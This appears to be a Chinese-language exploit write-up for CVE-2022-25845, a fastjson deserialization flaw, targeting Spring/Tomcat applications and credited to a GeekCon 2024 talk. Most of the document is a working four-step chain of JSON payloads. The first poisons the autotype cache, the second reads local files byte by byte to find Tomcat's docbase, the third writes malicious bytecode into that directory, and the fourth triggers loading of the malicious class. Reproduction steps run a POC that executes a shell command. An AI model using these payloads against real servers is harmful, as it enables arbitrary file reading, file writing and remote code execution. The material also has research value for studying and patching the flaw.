Share
## https://sploitus.com/exploit?id=307C3200-FE5B-5EB0-AA07-6048A1193D91
# CVE-2022-25845-In-Spring

# 主要依赖
1. jackson
2. commons-io

# 快速复现

1. idea导入项目 build ```mvn install```
2. Dockerfile build && run ```docker build .```
3. 运行src/test/java/POC.java 执行touch /tmp/pwned命令


# 利用说明

## Step1: 把java.io.InputStream 加入 fastjson autotype 缓存

```json
{
  "a": "{    \"@type\": \"java.lang.Exception\",    \"@type\": \"com.fasterxml.jackson.core.exc.InputCoercionException\",    \"p\": {    }  }",
  "b": {
    "$ref": "$.a.a"
  },
  "c": "{  \"@type\": \"com.fasterxml.jackson.core.JsonParser\",  \"@type\": \"com.fasterxml.jackson.core.json.UTF8StreamJsonParser\",  \"in\": {}}",
  "d": {
    "$ref": "$.c.c"
  }
}
```

![截屏2024-11-07 21.36.27](images/%E6%88%AA%E5%B1%8F2024-11-07%2021.36.27.png)

## Step2: file协议读取/tmp内容,获取tomcat的docbase文件名称

> 逐字节读取内容

```json
{
  "a": {
    "@type": "java.io.InputStream",
    "@type": "org.apache.commons.io.input.BOMInputStream",
    "delegate": {
      "@type": "org.apache.commons.io.input.BOMInputStream",
      "delegate": {
        "@type": "org.apache.commons.io.input.ReaderInputStream",
        "reader": {
          "@type": "jdk.nashorn.api.scripting.URLReader",
          "url": "${file}"
        },
        "charsetName": "UTF-8",
        "bufferSize": "1024"
      },
      "boms": [
        {
          "charsetName": "UTF-8",
          "bytes": ${data}
        }
      ]
    },
    "boms": [
      {
        "charsetName": "UTF-8",
        "bytes": [1]
      }
    ]
  },
  "b": {"$ref":"$.a.delegate"}
}
```

![截屏2024-11-07 21.35.56](images/%E6%88%AA%E5%B1%8F2024-11-07%2021.35.56.png)

## Step3: 写入恶意字节码到docbase目录下

```json
{
  "a": {
    "@type": "java.io.InputStream",
    "@type": "org.apache.commons.io.input.AutoCloseInputStream",
    "in": {
      "@type": "org.apache.commons.io.input.TeeInputStream",
      "input": {
        "@type": "org.apache.commons.io.input.CharSequenceInputStream",
        "cs": {
          "@type": "java.lang.String"
          "${shellcode}",
          "charset": "iso-8859-1",
          "bufferSize": ${size}
        },
        "branch": {
          "@type": "org.apache.commons.io.output.WriterOutputStream",
          "writer": {
            "@type": "org.apache.commons.io.output.LockableFileWriter",
            "file": "${file2write}",
            "charset": "iso-8859-1",
            "append": true
          },
          "charset": "iso-8859-1",
          "bufferSize": 1024,
          "writeImmediately": true
        },
        "closeBranch": true
      }
    },
    "b": {
      "@type": "java.io.InputStream",
      "@type": "org.apache.commons.io.input.ReaderInputStream",
      "reader": {
        "@type": "org.apache.commons.io.input.XmlStreamReader",
        "inputStream": {
          "$ref": "$.a"
        },
        "httpContentType": "text/xml",
        "lenient": false,
        "defaultEncoding": "iso-8859-1"
      },
      "charsetName": "iso-8859-1",
      "bufferSize": 1024
    },
    "c": {}
  }
```

![截屏2024-11-07 21.37.04](images/%E6%88%AA%E5%B1%8F2024-11-07%2021.37.04.png)

## Step4: 触发恶意类加载

```json
{
  "@type":"java.lang.Exception",
  "@type":"com.chenzai.HackException"
}
```

![截屏2024-11-07 21.35.32](images/%E6%88%AA%E5%B1%8F2024-11-07%2021.35.32.png)

# 参考/致谢

- [GeekCon 2024](https://www.geekcon.top/js/pdfjs/web/viewer.html?file=/doc/ppt/GC24_SpringBoot之殇.pdf)
- jsjcw